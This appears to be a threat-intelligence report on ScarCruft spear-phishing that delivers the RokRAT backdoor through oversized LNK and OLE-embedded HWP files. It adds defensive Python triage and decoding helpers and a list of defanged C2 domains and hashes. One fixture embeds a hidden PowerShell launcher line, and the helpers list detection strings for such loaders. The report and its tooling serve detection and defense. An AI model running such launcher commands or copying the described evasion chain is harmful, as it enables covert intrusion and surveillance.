We observed ScarCruft using oversized Windows Shortcut (LNK) files that initiate multi-stage infection chains delivering RokRAT, a custom-written backdoor associated with the threat group. RokRAT is a fully-featured backdoor equipped with capabilities that enable its operators to conduct effective surveillance on targeted entities. In an attempt to execute undetected, the infection chains involve multiple executable formats and evasion techniques. They continue an existing trend, closely resembling the infection chains seen in ScarCruft activities from earlier in 2023, including the campaigns disclosed by AhnLab in April 2023, Checkpoint in May 2023, and Qi An Xin in July 2023.

By targeting high-profile experts in North Korean affairs and news organizations focused on North Korea, ScarCruft continues to fulfill its primary objective of gathering strategic intelligence. This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Koreaโ€™s decision-making processes.

ScarCruftโ€™s focus on consumers of technical threat intelligence reports suggests an intent to gain insights into non-public cyber threat intelligence and defense strategies. This helps in identifying potential threats to their operations and contributes to refining their operational and evasive approaches. As we continue to track suspected North Korean threat actors and their pace of experimentation, we assess they have a growing interest in mimicking cybersecurity professionals and businesses, ultimately for use in the targeting of specific customers and contacts directly, or more broadly through brand impersonation.

ScarCruft Campaigns

A phishing email, impersonating a member of the North Korea Research Institute (Institute for North Korean Studies – INKS), was sent from the email address kirnchi122[@]hanmail.net on December 13, 2023, targeting an expert in North Korean affairs. The email contains an attached archive file named December 13th announcement.zip (machine translation from Korean), which includes nine files.

The files claim to be presentation materials from a fabricated event relevant to the targeted individual โ€” an apparent human rights expert discussion meeting. To make the phishing email current and therefore more credible, the email asserts that the meeting occurred on the same date the email was sent (December 13).

Phishing email (in Korean)

Among the nine files, seven are benign Hangul Word Processor (HWP) and PowerPoint documents, while two are malicious LNK files. LNK files have become popular among threat actors for malware deployment since Microsoftโ€™s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources.

In an attempt to make the malicious LNK files blend among the benign files, all files have names that relate to human rights in North Korea and start with a number assigned to each file. Furthermore, the LNK files disguise themselves as Hanword documents, using the Hangul Word Processor icon (the Icon location LNK artifact was set to C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe).

Filename Machine translation
1. ์ „์˜์„  ๋ถํ•œ ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp 1. Jeon Young-seonโ€™s plan to strengthen North Korean residentsโ€™ right to access information.hwp
2.์ด์ƒ์šฉ ๋ฐ˜๋™์‚ฌ์ƒ๋ฌธํ™”๋ฐฐ๊ฒฉ๋ฒ•๊ณผ ์ •๋ณด ์œ ์ž… ํ™œ๋™์˜ ๋ณ€ํ™”.pptx 2. Lee Sang-yongโ€™s reactionary ideology cultural rejection law and changes in information inflow activities.pptx
3. ์ด์œค์‹ ๋ถํ•œ์ธ๊ถŒ๋ฒ• ์‹คํ–‰๋ฐฉ์•ˆ ๋ถํ•œ์ธ๊ถŒ์žฌ๋‹จ ์ถœ๋ฒ” ์ค‘์‹ฌ.lnk 3. Lee Yun-sikโ€™s North Korean Human Rights Act implementation plan centered on the launch of the North Korean Human Rights Foundation.lnk
5. ์—ฌํ˜„์ฒ  ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™” ๋ฐฉ์•ˆ.hwp 5. Yeo Hyeon-cheolโ€™s plan to strengthen North Korean residentsโ€™ right to access information.hwp
6. ์ด์ข…๊ฒธ ๋ถํ•œ์ธ๊ถŒ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp 6. Lee Jong-gyeom North Korean human rights debate discussion paper.hwp
7. ๋ฐ•์œ ์„ฑ ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp 7. Park Yoo-sungโ€™s plan to strengthen North Korean residentsโ€™ access to information.hwp
8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk 8. Lee Do-gun North Korean Research Center Discussion.lnk
9. ๊น€ํƒœ์› ๋ถํ•œ์ธ๊ถŒ ์ „๋ฌธ๊ฐ€ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp 9. Taewon Kim, North Korean human rights expert discussion paper.hwp
10. ์„œ์œ ์„ ๋ถํ•œ ์ฃผ๋ฏผ๋“ค์˜ ์•Œ๊ถŒ๋ฆฌ ์ œ๊ณ  ๋ฐฉ์•ˆ.hwp 10. Seo Yoo-seokโ€™s plan to improve North Korean residentsโ€™ right to know.hwp

The LNK files exceed 48 MB and implement a multi-stage mechanism deploying the RokRAT backdoor.

Infection chain: 8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk

The LNK files execute PowerShell code that performs the following actions:

  • Locates the executing LNK file based on its filesize.
  • Extracts from the LNK file a decoy document (in HWP and HWPX format), a Windows Batch script named 111223.bat, and a PowerShell script named public.dat, placing the script in the %Public% folder.
  • Displays the decoy document and executes 111223.bat.
  • Deletes the executing Shortcut file.

The PowerShell code locates the content of the files it extracts from the LNK file based on hardcoded offsets.
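The following triage helper is an added example written for this post; it is not ScarCruft's code, and the sample shortcut it builds is constructed, not one of the reported LNK files. It checks the fixed ShellLinkHeader, flags an oversized shortcut (the 1 MB threshold is an assumption; the reported samples exceed 48 MB), searches the raw bytes for the UTF-16LE launcher strings and the ZIP signature 50 4b 03 04 that the testing-grounds variant of this loader uses instead of hardcoded offsets, and lists the members of any embedded ZIP container (HWPX decoys are ZIP-based). The `%Public%\public.dat` string mirrors the artifact named in the text; `Contents/section0.xml` is a placeholder member name.

```python
import io
import struct
import zipfile

# Fixed LNK header: HeaderSize is always 0x4C and LinkCLSID is 00021401-0000-0000-C000-000000000046
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
PK_SIG = b"PK\x03\x04"  # ZIP local file header; HWPX decoys are ZIP containers
# Assumed triage threshold: a genuine shortcut is a few KB, the reported samples exceed 48 MB
DEFAULT_OVERSIZE = 1024 * 1024
# Strings worth flagging inside a shortcut; Windows stores LNK string data as UTF-16LE
WATCH_STRINGS = ("powershell", "%public%", "-windowstyle hidden", "hwp.exe")


def is_lnk(data: bytes) -> bool:
    """Validate the fixed ShellLinkHeader (size field and CLSID)."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    return header_size == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def find_all(data: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs: the byte-pattern search, as opposed to trusting hardcoded offsets."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def find_utf16_strings(data: bytes, needles=WATCH_STRINGS) -> dict:
    """Case-insensitive UTF-16LE search; bytes.lower() only maps ASCII, so the interleaved NULs are untouched."""
    lowered = data.lower()
    hits = {}
    for needle in needles:
        off = lowered.find(needle.lower().encode("utf-16-le"))
        if off != -1:
            hits[needle] = off
    return hits


def carve_zip_members(data: bytes, offset: int) -> list:
    """Member names of a ZIP container starting at offset, or [] if it is not a readable archive."""
    try:
        with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return []


def triage_lnk(data: bytes, oversize_threshold: int = DEFAULT_OVERSIZE) -> dict:
    """Summarise the indicators a responder wants before detonating anything."""
    pk_offsets = find_all(data, PK_SIG)
    return {
        "is_lnk": is_lnk(data),
        "size": len(data),
        "oversized": len(data) > oversize_threshold,
        "pk_offsets": pk_offsets,
        "strings": find_utf16_strings(data),
        "embedded_zip_members": carve_zip_members(data, pk_offsets[0]) if pk_offsets else [],
    }


def build_sample_lnk() -> bytes:
    """Constructed stand-in for an oversized LNK: valid header, UTF-16LE launcher string, padding, embedded ZIP."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    launcher = "powershell -WindowStyle Hidden -File %Public%\\public.dat".encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Contents/section0.xml", "<constructed HWPX placeholder/>")
    return header + launcher + b"\x00" * 8192 + buf.getvalue()


if __name__ == "__main__":
    report = triage_lnk(build_sample_lnk(), oversize_threshold=4096)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against a real sample, the size check alone separates these loaders from any legitimate shortcut, and the PK offsets tell you where to carve the decoy without trusting the offsets the loader hardcodes.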

PowerShell code

111223.bat then executes the PowerShell script stored in %Public%\public.dat. This script decodes and executes another hex-encoded PowerShell script embedded in public.dat.

The content of public.dat

The decoded script downloads from a major Cloud file hosting provider a file named myprofile[.]zip, XOR-decrypts the file using the first byte as an XOR key, and executes the decrypted content in a thread.

myprofile[.]zip implements a shellcode that deploys the RokRAT backdoor. RokRAT uses public Cloud services for command-and-control purposes, such as pCloud and Yandex Cloud, disguising malicious communication as legitimate network traffic.
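The two decoding steps just described, the hex-encoded inner script carried in public.dat and the first-byte XOR key applied to the downloaded blob, are simple enough that an analyst can unpack them statically. The helper below is an added example for this post, not the group's loader; the outer script and the encrypted blob it works on are constructed fixtures, the 64-character minimum for a hex run and the UTF-8 decoding of the inner script are assumptions, and the `xor_encrypt_first_byte_key` function exists only to build the fixture.

```python
import re


def extract_hex_blobs(script_text: str, min_len: int = 64) -> list:
    """Hex runs of at least min_len characters with an even length, so they decode to whole bytes."""
    pattern = re.compile(rf"[0-9A-Fa-f]{{{min_len},}}")
    return [m.group(0) for m in pattern.finditer(script_text) if len(m.group(0)) % 2 == 0]


def decode_hex_stage(blob: str) -> str:
    """Decode a hex-encoded script stage; UTF-8 is assumed, undecodable bytes are escaped rather than dropped."""
    return bytes.fromhex(blob).decode("utf-8", errors="backslashreplace")


def xor_decrypt_first_byte_key(data: bytes) -> bytes:
    """Single-byte XOR where the key is the first byte of the file and the payload is the remainder."""
    if not data:
        raise ValueError("empty payload")
    key = data[0]
    return bytes(b ^ key for b in data[1:])


def xor_encrypt_first_byte_key(payload: bytes, key: int) -> bytes:
    """Inverse of the above; used here only to construct the test fixture."""
    return bytes([key]) + bytes(b ^ key for b in payload)


def unpack_stages(outer_script: str, downloaded_blob: bytes) -> dict:
    """Walk both decoding steps and return what each yields, for static review before any detonation."""
    inner = [decode_hex_stage(b) for b in extract_hex_blobs(outer_script)]
    return {"inner_scripts": inner, "decrypted_payload": xor_decrypt_first_byte_key(downloaded_blob)}


# Constructed fixtures: an outer loader carrying a hex-encoded inner script, and a first-byte-keyed XOR blob
INNER_SCRIPT = "Write-Output 'constructed inner stage'"
OUTER_SCRIPT = (
    "$stage = '" + INNER_SCRIPT.encode().hex() + "'\n"
    "# constructed loader; the decoding and execution logic is deliberately omitted here\n"
)
ENCRYPTED_BLOB = xor_encrypt_first_byte_key(b"CONSTRUCTED-SHELLCODE-PLACEHOLDER", 0x5A)

if __name__ == "__main__":
    print(unpack_stages(OUTER_SCRIPT, ENCRYPTED_BLOB))
```

The first byte of a real capture is the key, so the decrypted output starts at offset 1; a sandbox or memory capture of the loader thread should match what this returns.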

PowerShell script executing shellcode

While most of the documents we analyzed are stripped of metadata, a HWPX decoy document stands out by containing metadata that identifies the pseudonym bandi as the documentโ€™s creator. We note the use of the same string in the context of Kimsuky activities, for example, in an email address used in a phishing campaign (bandi00413[@]daum.net) and in a C2 server domain (one.bandi[.]tokyo).

While the overlap in pseudonym use does not represent a strong link between the groups from a technical perspective, it is still indicative of the suspected relations between them. In the context of North Korea, the term bandi is known as the pseudonym of a suspected North Korean author known for publishing dissident writing. bandi also means โ€˜fireflyโ€™ in Korean.

The bandi pseudonym (HWPX document metadata)

Earlier Overlapping Campaign

Some of the individuals targeted in the December 2023 ScarCruft activity, discussed above, were also targeted approximately one month earlier on November 16, 2023. This speaks to the adversary’s persistence and adaptability in pursuing its goals. The November campaign included individuals from a news organization focused on North Korea as well.

A phishing email, impersonating a member of the North Korea Research Institute, was sent from the address c039911[@]daum.net. The email attaches two malicious HWP files, titled ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(ํšŒ๋ น).hwp (Shipbuilding market price analysis (Hoeryeong).hwp) and ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(์‹ ์˜์ฃผ).hwp (Shipbuilding market price analysis (Sinuiju).hwp, machine translation from Korean), disguised as North Korean market price analysis data.

Phishing email (in Korean)

The documents contain OLE objects, activated by double-clicking on the documentโ€™s content. In adherence to the HWP document format, the OLE objects are stored as compressed Structured Storage objects, and their decompression reveals C2 URLs accessed upon OLE object activation.

The HWP documents contain metadata, including the LinkValue, Last Saved By, and Author metadata values, which provide information on the system accounts where the documents have been created.
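To pull the C2 URLs out of such a document without opening it, the compressed stream has to be inflated first. The helper below is an added example for this post, not a tool from the report: it inflates a stream the way HWP 5 stores compressed BinData/BodyText streams (raw deflate, so zlib is called with wbits=-15), then searches the result for URLs stored either as ASCII or as UTF-16LE and defangs them the way the report does. The stream it scans is constructed, with a fictitious host; the inflate-or-fall-through behaviour for uncompressed streams is an assumption.

```python
import re
import zlib

URL_RE = re.compile(rb"https?://[\w.\-/?=&%:]+", re.IGNORECASE)


def decompress_hwp_stream(raw: bytes) -> bytes:
    """HWP 5 stores compressed streams as raw deflate (no zlib header), hence wbits=-15.
    A stream that fails to inflate is returned unchanged so uncompressed documents are still scanned."""
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return raw


def defang(url: str) -> str:
    """Render a URL as http[://]host[.]tld so it cannot be clicked by accident."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return f"{scheme}[://]{host.replace('.', '[.]')}{sep}{path}"


def extract_urls(stream: bytes) -> list:
    """URLs stored as ASCII or as UTF-16LE (embedded OLE objects often use the latter), defanged and de-duplicated."""
    candidates = []
    # Stripping NULs turns UTF-16LE ASCII text into plain ASCII; the raw view catches genuine ASCII strings
    for view in (stream, stream.replace(b"\x00", b"")):
        candidates += [m.group(0).decode("ascii", "ignore") for m in URL_RE.finditer(view)]
    seen, unique = set(), []
    for url in candidates:
        if url not in seen:
            seen.add(url)
            unique.append(defang(url))
    return unique


def scan_hwp_stream(raw: bytes) -> list:
    """Inflate one stream and report the URLs it references."""
    return extract_urls(decompress_hwp_stream(raw))


def build_sample_stream() -> bytes:
    """Constructed stand-in for a compressed OLE-object stream carrying a UTF-16LE URL (fictitious host)."""
    url = "http://nav.example.invalid/capture/parts/you?view=CONSTRUCTED"
    body = b"\x01\x00\x00\x00" + url.encode("utf-16-le") + b"\x00\x00" + b"\x05\x06\x07"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return comp.compress(body) + comp.flush()


if __name__ == "__main__":
    for hit in scan_hwp_stream(build_sample_stream()):
        print(hit)
```

For a real document, enumerate the streams of the OLE compound file (for example with the olefile package) and pass each BinData stream through `scan_hwp_stream`; the metadata values in the table that follows live in the SummaryInformation stream and the file's own header, not in the compressed streams.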

HWP document, C2 URL and metadata:

조선 시장 물가 분석(회령).hwp
  C2 URL: http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC
  LinkValue: \Users\Moo\AppData\Local\Temp
  Last Saved By: Moo
  Author: Moo

조선 시장 물가 분석(신의주).hwp
  C2 URL: http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM
  LinkValue: \Users\DailyN~1\AppData\Local\Temp
  Last Saved By: dailynk_001
  Author: dailynk01

The DailyN~1/dailynk_001/dailynk01 account is particularly interesting since it relates to Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea, with which we have collaborated in the past. The focus of this organization makes it an attractive target for North Korean threat actors seeking to intrude into or impersonate it, a strategy previously observed by SentinelLabs in past Kimsuky campaigns. It remains to be investigated whether this account is used for developing malware involved in Daily NK-related campaigns and/or serves as an additional indicator of the suspected relations between Kimsuky and ScarCruft. Additionally, in our previous reporting on the overlap of suspected North Korean intrusions into a Russian missile engineering organization, we shared links to ScarCruft infrastructure making use of this same illicit naming scheme, such as dallynk[.]com.

Pivoting on the DailyN~1 artifact revealed additional HWP documents that share overlapping metadata information and employ the same OLE-based infection vector, using different C2 URLs.

HWP document (SHA-1 hash), C2 URL and metadata:

e9df1f28cfbc831b89a404816a0242ead5bb142c
  C2 URL: http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP
  LinkValue: \Users\DailyN~1\AppData\Local\Temp
  Last Saved By: dailynk01
  Author: umgdnk-03

2f78abc001534e28eb208a73245ce5389c40ddbe
  C2 URL: http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU
  LinkValue: \Users\DailyN~1\AppData\Local\Temp
  Last Saved By: dailynk_001
  Author: /

The app.documentoffice[.]club domain is also used as a C2 endpoint for malicious Microsoft Office documents, which employ ActiveX controls to establish communication with the C2 server.

Office document (SHA-1 hash) C2 URL
e46907cfaf96d2fde8da8a0281e4e16958a968ed http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950
39c97ca820f31e7903ccb190fee02035ffdb37b9 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE
577c3a0ac66ff71d9541d983e37530500cb9f2a5 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6

At the time of analysis, the C2 URLs were inactive, preventing us from examining their functions and any potential additional payloads they might deliver to the targets. We are still investigating the role of the user and view query parameter values, such as 5JV0FAGA6KW1GBHB7LX2HCIC and H11I75PFF0ZG53NDG00H64OE.

While preparing this report, Genians released research that outlines ScarCruft campaigns throughout 2023, covering certain aspects of the activities discussed in this section. We add to the public information on this activity cluster by providing additional details on the related infrastructure.

Infrastructure associated with this cluster of suspected North Korean threat activity leads to multiple interesting details which we have found useful for further monitoring and analysis of separate campaigns. The domains offlinedocument[.]site and documentoffice[.]club both make use of a variety of subdomains such as open, nav, and app as previously mentioned. During their illicit use, the domains temporarily make use of Lithuaniaโ€™s Cherry Servers virtual private server (VPS) hosting service โ€“ 84.32.131[.]87, and 84.32.131[.]104 in this case.

A repeating trend is the actor registering domains through Namecheap, leaving the domain parked on a Namecheap IP address, and then rotating to Cherry Servers. In separate domains, we observe this same operational workflow, and interestingly other domains which the actor only makes use of for one or two days before shifting back to a parked IP address. We assess this process aims to limit detection and analysis capabilities following their malicious activity, such as hosting a phishing login or malware delivery link.
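The park-then-rotate workflow described above is something a passive DNS feed can surface on its own: a domain that sits on a registrar parking address, moves to a watched hosting IP for a day or two, and then returns to parking. The script below is an added example written for this post, not tooling from the report. The two Cherry Servers addresses come from the report's IOC list; the parking network (TEST-NET-2), the record format, the domains other than instantreceive[.]org, and the dates are all constructed.

```python
from collections import defaultdict
from datetime import date
from ipaddress import ip_address, ip_network

# Cherry Servers addresses taken from the report's IOC list; extend with any other watched hosting IPs
WATCHED_VPS_IPS = {ip_address(ip) for ip in ("84.32.131.87", "84.32.131.104")}
# Constructed stand-in for registrar parking space (TEST-NET-2); derive real parking ranges from your own pDNS data
PARKING_NET = ip_network("198.51.100.0/24")


def classify_ip(ip: str) -> str:
    addr = ip_address(ip)
    if addr in WATCHED_VPS_IPS:
        return "vps"
    if addr in PARKING_NET:
        return "parked"
    return "other"


def find_short_lived_vps_use(records, max_days: int = 2) -> list:
    """Flag domains that moved parked -> watched VPS -> parked, staying on the VPS for at most max_days.
    records: iterable of (domain, ip, first_seen, last_seen) with date objects, as a pDNS export would give."""
    history = defaultdict(list)
    for domain, ip, first, last in records:
        history[domain].append((first, last, classify_ip(ip), ip))
    flagged = []
    for domain, entries in history.items():
        entries.sort()  # chronological by first_seen
        for prev, cur, nxt in zip(entries, entries[1:], entries[2:]):
            if prev[2] == "parked" and cur[2] == "vps" and nxt[2] == "parked":
                days = (cur[1] - cur[0]).days + 1  # inclusive of both ends
                if days <= max_days:
                    flagged.append((domain, cur[3], days))
    return flagged


def pivot_on_vps_ips(records) -> dict:
    """Group every domain that ever resolved to a watched VPS IP by that IP (a moderate-confidence pivot)."""
    groups = defaultdict(set)
    for domain, ip, _first, _last in records:
        if classify_ip(ip) == "vps":
            groups[ip].add(domain)
    return {ip: sorted(domains) for ip, domains in groups.items()}


# Constructed passive DNS history; instantreceive.org is named in the report, the other domains are invented
SAMPLE_RECORDS = [
    ("instantreceive.org", "198.51.100.10", date(2023, 10, 1), date(2023, 10, 15)),
    ("instantreceive.org", "84.32.131.87", date(2023, 10, 16), date(2023, 10, 17)),
    ("instantreceive.org", "198.51.100.10", date(2023, 10, 18), date(2023, 11, 1)),
    ("long-lived.example", "198.51.100.10", date(2023, 9, 1), date(2023, 9, 10)),
    ("long-lived.example", "84.32.131.104", date(2023, 9, 11), date(2023, 9, 30)),
    ("long-lived.example", "198.51.100.10", date(2023, 10, 1), date(2023, 10, 20)),
    ("benign.example", "198.51.100.10", date(2023, 8, 1), date(2023, 12, 1)),
]

if __name__ == "__main__":
    print(find_short_lived_vps_use(SAMPLE_RECORDS))
    print(pivot_on_vps_ips(SAMPLE_RECORDS))
```

The short window is the signal: a domain that lives on the VPS for weeks is ordinary hosting, while a one- or two-day stay bracketed by parking matches the workflow the report describes and is worth a closer look at what was served during that window.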

Examples of this activity can be found through publicly available telemetry, such as that of instantreceive[.]org. This domain hosted a page mimicking GitHub, a characteristic not new to North Korea-attributed threat actors, as we have reported on in the past.

GitHub phishing page

This domain overlaps with the rest of the cluster through shared Cherry Servers hosting IPs, which can be used for further moderate-confidence infrastructure pivoting. We encourage readers to conduct additional research and monitoring. The full list shown here is provided in the IOC table.

Cherry Servers overlap map

ScarCruft Testing Grounds

While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruftโ€™s planning and testing processes. This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk.

Although similar to those implemented by 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk discussed above, the infection chains executed by inteligence.lnk and news.lnk exhibit some differences. This has likely been done to evade detection based on the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

Infection chain: news.lnk

inteligence.lnk executes PowerShell code, which locates the executing LNK file based on its filename instead of its filesize. The code then extracts from the LNK file and displays a decoy PDF document (named inteligence.pdf), and downloads from a major Cloud file hosting provider a hex-encoded file named story.txt. The PowerShell code locates the content of the decoy document it extracts from the LNK file based on a byte pattern (50 4b 03 04) instead of a hardcoded file offset.

The PowerShell code then decodes the file, and executes the decoded file content in a thread. story.txt implements a benign shellcode that just opens notepad.exe, indicating that inteligence.lnk has been developed for testing purposes.

In contrast to 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk, inteligence.lnk does not execute a Windows Batch script and an external PowerShell script.

inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode

news.lnk downloads PowerShell code in the form of a file named story3.txt and executes it. The implementation and functionality of the code are very similar to that executed by inteligence.lnk, with a major difference being that the shellcode it executes is not downloaded from a remote endpoint but is embedded in the LNK file itself.

In contrast to inteligence.lnk, the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor. It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns. As of the time of writing, we have not observed news.lnk or its variants in the wild.

Both LNK files deploy the same decoy document โ€“ a public research report on the Kimsuky threat group by Genians, a South Korean cybersecurity company. The report is written in Korean and was released in late October 2023.

Decoy document

Given the reportโ€™s technical content, the LNK file names, and ScarCruftโ€™s use of decoys relevant to the targeted individuals, we suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber threat landscape, targeting audiences consuming threat intelligence reports.

Conclusions

The findings outlined in this post highlight ScarCruftโ€™s ongoing dedication to gathering strategic intelligence through targeted attacks. Our insight into ScarCruftโ€™s malware testing activities reveals the adversaryโ€™s commitment to innovating its arsenal and expanding its target list, likely intending to target and/or masquerade as cybersecurity professionals or businesses.

We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

We suspect that ScarCruft is pursuing non-public cyber threat intelligence and defense strategies. This could benefit not only ScarCruft specifically but also the other constituent groups within the North Korean threat landscape, aiding them in identifying threats to their operations and improving their operational playbooks.

A heightened awareness and better understanding of the adversaryโ€™s attack and infection methods among potential targets are crucial for effective defense. SentinelLabs remains actively engaged in tracking ScarCruft activities and supporting the organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

Value Note
0ED884A3FC5C28CDB8562CD28993B30991681B0A intelligence.lnk
2F78ABC001534E28EB208A73245CE5389C40DDBE Malicious HWP document
39C97CA820F31E7903CCB190FEE02035FFDB37B9 Malicious Office document
4024A9B0C0F19A33A3C557C7E220B812EE6FDD17 8. ์ด๋„๊ฑด ๋ถํ•œ์—ฐ๊ตฌ์†Œ ํ† ๋ก ํšŒ.lnk
46C3F9DE79D85165E3749824804235ACA818BA09 9. ๊น€ํƒœ์› ๋ถํ•œ์ธ๊ถŒ ์ „๋ฌธ๊ฐ€ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp
483B84F973528B23E5C14BC95FBC7031A4B291F1 1. ์ „์˜์„  ๋ถํ•œ ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp
4C74E227190634A6125B2703B05CB16AD69AC051 2.์ด์ƒ์šฉ ๋ฐ˜๋™์‚ฌ์ƒ๋ฌธํ™”๋ฐฐ๊ฒฉ๋ฒ•๊ณผ ์ •๋ณด ์œ ์ž… ํ™œ๋™์˜ ๋ณ€ํ™”.pptx
577C3A0AC66FF71D9541D983E37530500CB9F2A5 Malicious Office document
7C4E37E0A733B5E8F0F723CCA2A9675901527DC4 Decoy document
88DB1E2EFBB888A97A530C8BEF8CA104CEAAB80C public.dat
8951F3EB2845C0060E2697B7F6B25ABE8ADE8737 3. ์ด์œค์‹ ๋ถํ•œ์ธ๊ถŒ๋ฒ• ์‹คํ–‰๋ฐฉ์•ˆ ๋ถํ•œ์ธ๊ถŒ์žฌ๋‹จ ์ถœ๋ฒ” ์ค‘์‹ฌ.lnk
9DD8AA1D66CC4E765E63DC5121216D95E62A0E1C 10. ์„œ์œ ์„ ๋ถํ•œ ์ฃผ๋ฏผ๋“ค์˜ ์•Œ๊ถŒ๋ฆฌ ์ œ๊ณ  ๋ฐฉ์•ˆ.hwp
9E0C6A067AAB113E6A4B68299AB3B9D4C36FC330 news.lnk
9EAAAB9D4F65E3738BB31CDF71462E614FFBD2BA 6. ์ด์ข…๊ฒธ ๋ถํ•œ์ธ๊ถŒ ํ† ๋ก ํšŒ ํ† ๋ก ๋ฌธ.hwp
B23A3738B6174F62E4696080F2D8A5F258799CE5 ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(ํšŒ๋ น).hwp
B91B318A9FBB153409A846BF173E9D1BD0CC4DBF 111223.bat
C4B58CA12F7B16B6D39CE4222A5A2E054CD77B4E 7. ๋ฐ•์œ ์„ฑ ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ ๊ฐ•ํ™”๋ฐฉ์•ˆ.hwp
D457D6BDCFA6D31934FB1E277FA0DE7119E9C2A5 5. ์—ฌํ˜„์ฒ  ๋ถํ•œ์ฃผ๋ฏผ ์ •๋ณด์ ‘๊ทผ๊ถŒ ๊ฐ•ํ™” ๋ฐฉ์•ˆ.hwp
D9AC0CC6D7BDC24F52878D3D5AC07696940062D0 myprofile[.]zip
E46907CFAF96D2FDE8DA8A0281E4E16958A968ED Malicious Office document
E9DF1F28CFBC831B89A404816A0242EAD5BB142C Malicious HWP document
FBF4D8C7418B021305317A185B1B3534A2E25CC8 ์กฐ์„  ์‹œ์žฅ ๋ฌผ๊ฐ€ ๋ถ„์„(์‹ ์˜์ฃผ).hwp

Domains

Value Note
app[.]documentoffice[.]club C2 domain (HWP and Office documents)
benefitinfo[.]live VPS overlap (moderate confidence)
benefitinfo[.]pro VPS overlap (moderate confidence)
benefiturl[.]pro VPS overlap (moderate confidence)
careagency[.]online VPS overlap (moderate confidence)
cra-receivenow[.]online VPS overlap (moderate confidence)
crareceive[.]site VPS overlap (moderate confidence)
depositurl[.]co VPS overlap (moderate confidence)
depositurl[.]lat VPS overlap (moderate confidence)
direct.traderfree[.]online VPS overlap (moderate confidence)
forex.traderfree[.]online VPS overlap (moderate confidence)
groceryrebate[.]online VPS overlap (moderate confidence)
groceryrebate[.]site VPS overlap (moderate confidence)
gstcreceive[.]online VPS overlap (moderate confidence)
instantreceive[.]org VPS overlap (moderate confidence)
nav[.]offlinedocument[.]site C2 domain (HWP documents)
receive[.]bio VPS overlap (moderate confidence)
receiveinstant[.]online VPS overlap (moderate confidence)
rentsubsidy[.]help VPS overlap (moderate confidence)
rentsubsidy[.]online VPS overlap (moderate confidence)
tinyurlinstant[.]co VPS overlap (moderate confidence)
urldepost[.]co VPS overlap (moderate confidence)
verifyca[.]online VPS overlap (moderate confidence)
visiononline[.]store VPS overlap (moderate confidence)

URLs

Value Note
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950 C2 URL (Office document)
